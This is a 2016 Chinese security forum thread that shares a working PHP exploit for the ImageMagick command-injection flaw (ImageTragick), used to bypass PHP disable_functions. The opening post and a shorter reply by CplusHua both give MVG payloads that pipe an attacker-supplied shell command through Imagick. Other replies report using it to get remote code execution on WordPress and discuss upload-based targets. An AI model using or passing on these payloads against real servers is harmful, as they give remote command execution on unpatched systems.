诶，绕过 disable_function 的新姿势 - ImageMagick 的锅 20160504

先贴链接：http://pastebin.com/aE4sKnCg
ImageMagick 的新洞，可以影响司机驾驶。  

exp 代码：
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = << push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>

收藏 感谢(0)

分享到： 0

25 个回复

1. 1# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-04 18:55

   
   
   远程打了一下..
   感觉还是file_put_contents在/tmp里比较好（

2. 2# xsser (十根阳具有长短!!) | 2016-05-04 19:29

   各种去找老司机了

3. 3# 7路公交老司机 (听，五菱宏光在唱歌。) | 2016-05-04 19:37

   凶！！！

4. 4# YiYang | 2016-05-04 20:23

   还在和老司机学序列化，这个就来了。。。

5. 5# 纷纭 (:-)) | 2016-05-04 20:39

   66666

6. 6# todaro (学习装逼) | 2016-05-04 21:13

   听说有人要用这个  去挖wp的rce

7. 7# newbie0086 | 2016-05-04 21:32

   感谢分享非常棒

8. 8# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-04 21:48

   @todaro 卧槽，我去挖挖看..

9. 9# Azui | 2016-05-04 21:56

   赞！

10. 10# phith0n (我也不会难过 你不要小看我) | 2016-05-04 22:11

    @Ricter @todaro 整了一下午，discuz失败wp成功，主站发了一个

11. 11# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-04 22:34

    @phith0n 我也找到了wp的rce..可怕

12. 12# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-04 22:35

    @phith0n 不过需要权限，哭瞎= =

13. 13# phith0n (我也不会难过 你不要小看我) | 2016-05-04 22:37

    @Ricter discuz那个给我气死了，弄了好久结果也没弄出来

14. 14# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-04 22:42

    @phith0n discuz那个好像直接调用 imagick 的命令行，我就没再细看了。

15. 15# CplusHua | 2016-05-05 00:07

    简化一下楼主的代码如下: $c=$_REQUEST['c'];
$e = << push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|$c")'
pop graphic-context
EOF;
$i = new Imagick();
$i->readImageBlob($e);

16. 16# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-05 00:56

    @CplusHua
    啊原来 readImageBlob 就可以（

17. 17# Ricter (勿忘初心 (๑`･ᴗ･´๑) | 2016-05-05 01:03

    @CplusHua $thumb = new Imagick($imagick_file); 这样就能直接命令执行了...都不用调用啥

18. 18# 7路公交老司机 (听，五菱宏光在唱歌。) | 2016-05-05 08:21

    @YiYang 这个版本我记得要5.4以上吧。。。你那个是5.2，估计不行。。。。

19. 19# todaro (学习装逼) | 2016-05-05 08:48

    @phith0n joomla、水滴之类的，都有机会的吧

20. 20# todaro (学习装逼) | 2016-05-05 08:48

    @phith0n 包括这个，https://www.npmjs.com/search?q=imagemagick

21. 21# YiYang | 2016-05-05 08:52

    @7路公交老司机 是的，老版本没这个扩展。。。

22. 22# newbie0086 | 2016-05-05 09:31

    前提需要安装imagick模块,

23. 23# CplusHua | 2016-05-05 09:53

    @Ricter 对啊,如果一些网站对图片进行二次渲染,会不会只要上传图片就能执行了.

24. 24# possible (everything is possible) | 2016-05-05 10:13

    ding

25. 25#

    删除 回复此人 感谢

    一个小渣渣 | 2016-05-05 10:27

    6666666666666坐等老司机挖洞利用姿势